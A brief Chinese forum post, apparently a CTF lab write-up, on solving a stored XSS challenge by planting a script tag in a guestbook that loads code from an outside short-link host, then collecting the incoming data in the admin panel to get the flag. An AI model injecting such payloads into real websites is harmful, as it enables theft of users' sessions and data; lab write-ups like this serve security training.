【蓝胖】靶场第四章 XSS存储型

菜刀也是刀   ·   发表于 2018-07-25 14:44:50   ·   CTF&WP专版

直接给出了后台地址,试了之前密码都没用,就换个思路吧

发现网站有留言板,嘿嘿,试试XSS

不管了,一顿乱插

提交刷新,发现有XSS漏洞的

拆入存储型XSS

<script src=http://t.cn/Rgdd5Y></script>

提交后,就去后台等一会,发现有数据来了

flag出现

打赏我,让我更有动力~

0 条回复   |  直到 2018-7-25 | 1344 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.